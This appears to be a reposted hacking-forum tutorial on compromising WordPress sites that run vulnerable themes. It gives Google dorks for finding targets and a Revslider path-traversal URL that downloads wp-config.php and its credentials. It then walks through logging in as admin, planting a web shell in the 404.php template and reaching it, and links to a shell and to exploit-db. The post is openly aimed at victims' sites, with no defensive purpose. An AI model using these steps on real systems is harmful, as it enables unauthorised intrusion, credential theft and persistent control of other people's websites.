![[Image: o0P5sC6.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v5RVzPtOb0coegA7vGFkyHBSVxDff15FoZIOshnegfN20fDeXMNfFNnebZBHCJB99FYvoeTqAUciYlvu-d20YrPw=s0-d)
![[Image: gxjTHVc.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tIcKjgpBZdVzgubi4Cmr8Rb24FaSrfNP4AFN4PeYFPzFzvdNCUI10Zyn_B22llYHahKvhEIrqYSkYQ_vlhPGe3Hw=s0-d)
What's up bitchez!?
Today I thought I'd take some time and show you how EASY it is to hack multiple WordPress websites through some vulnerable themes.
Tutorial:
1.) Go to:
Quote:http://www.google.com
2.) Enter one of the dorks below and click search;
PHP Code:
"Index of" +/wp-content/themes/cuckootap/"Index of" +/wp-content/themes/IncredibleWP/"Index of" +/wp-content/themes/ultimatum"Index of" +/wp-content/themes/medicate/"Index of" +/wp-content/themes/Centum/"Index of" +/wp-content/themes/Avada/"Index of" +/wp-content/themes/striking_r/"Index of" +/wp-content/themes/beach_apollo/ Updated: 9/20/14
PHP Code:
inurl:wp-content/themes/jupiter
inurl:wp-content/themes/forall
inurl:wp-content/themes/x
inurl:wp-content/themes/celestial-lite
inurl:wp-content/themes/3clicks EXAMPLE:
![[Image: pR0gnyZ.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u_08FAPaMOivOzg1sQKstpnq9fFZHDPZilhyfCvKUEF-FYM_52tZk4ZQeXx-mCkg9iWq-6PRawYEy7amKucbL4Kw=s0-d)
3.) Click on any website;
![[Image: RWgYQVs.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tCPfzuk-_w9cwTsm2OxnwK-ISv4N3RrE6S48AE3JhEr--g42RSVyEKnmzs08voa7Gx65qLsDmVveFd-mTBScIEBQ=s0-d)
4.) Now just change the URL to:
PHP Code:
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php ![[Image: TdVHsEy.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tzdgUA5ZtyA54-4SLu4DtrD_8ix6bzY2rCANeg_Z99bKfzrB_viXdmiQ3ufJynO39R7lIQjoNoBcBwVewz9UhS=s0-d)
You will be prompt to download the admin.ajax.php.
![[Image: SYy8JmN.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tLaS2tUuEFC-_OVzXCM3_AF8JkJqYCGx_f2_9yVTCS7ISbHdOim-xULrS3MVSSq47y7Bg-5ILpKvvwnzFj2kL5=s0-d)
Open with Notepad and click "OK"
5.) What just happen was you just downloaded the sites configuration file (Arbitrary File Download) where the default Administrator login details are stored.
![[Image: g8RRwmp.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sCNHnPaUbF1y5l9EArKz5HJ7xNhIO9Eu0BQf3Kfnl9p1r7kHNKG6oveNVCw9AKJaHPYRiCG5VAQfa7x6-gTShrwA=s0-d)
6.) Now that you have the administrators login details let's try to login. Go to admin login page:
PHP Code:
www.target.com/admin/
orwww.target.com/wp-login.php ![[Image: EDGQP9N.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uEI3D8qnrDODYluC3zTmVXIFtM6y0HYCFEesKWFYUuPwY1btrprEYhcdsSdMOfcFYBBLYuB6NHwMwNABUuUSy0=s0-d)
EDIT:
When you enter the username and password. Most of the time the username will always be: admin but the password is the default password for the MySQL database. Sometimes the admin will use the same password as the MySQL password to login to the WordPress Dashboard, if not move on to the next vulnerable wordpress site and repeat the steps above until you find one that gives you access to the dashboard.
7.) Once you gain access to the dashboard you will be able to upload your shell to the site by clicking on "Appearance" then "Editor".
![[Image: ZBxLp7X.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tAZgd2yPx2k-EM5_CFHUXAgx0JSuzCyGnOdROvhbAvpR0dzrM-1spDKfrRBUDuku2lcvrP0wwpSMgHHhXksFeJ=s0-d)
8.) On the left under Templates click on 404 template (404.php)
![[Image: cLDFntI.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_svcd7HjvjWNKiXOLUlMTPIkPtDyN_ltJAbWceU-yD3aZ3UYlP1PBr-viS7ImiNZnNtLtPxiQ0iErjF_lCVqXou3Q=s0-d)
9.) Next paste your shell code and click "Upload File"
![[Image: ewssKJT.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uOXEWKF5gaqbrXiLylyjC3j-48dUILZWEzuAPt6pupdQNByUVU7tqyd6GwpfAHnO9ufCVhQ81tPoBva4j7xTzy=s0-d)
NOTE: if you do not have a shell you can find the one used in this tut here:
Quote:http://pastebin.com/cuWAmsUE
10.) Enter URL below to access your shell.
PHP Code:
www.target/wp-content/themes/THEME NAME /404.php ![[Image: i2cf2NE.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uXWKhz_zo5UsQG_dkwnzht3-JCSga2fanTNao3opPJXYNoRxrtGX87564IP8wjCXkPXfOqOKGPq9fNu5MGuy0E=s0-d)
Not Working? Try this:
Quote:http://www.hackforums.net/showthread.php?tid=2312449
These are public exploits and can be found @:
Quote:http://www.exploit-db.com/exploits/34511/
Happy Hacking! And thanks for viewing my thread.
PoC from: Ao Haru Ride
(09-15-2014 06:55 AM)Ao Haru Ride Wrote: ►Hi mate I got one. Im happy now
Thanks :)
![[Image: GGDn7bx.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uatfqM4eJVKI6AC13KLIeHF6u81Lj9N6Unr2cO0oXOZwmcu1MScJA_hX3mQMhNun3JK1_4f2a_WFTpY_gyCmO06w=s0-d)
"That is really interesting, You are an excessively professional
ReplyDeleteblogger. I have joined your rss feed and stay up for in the
hunt for extra of your excellent post.
Take a look at my weblog :: Technology Bank | D-Hacking Blog"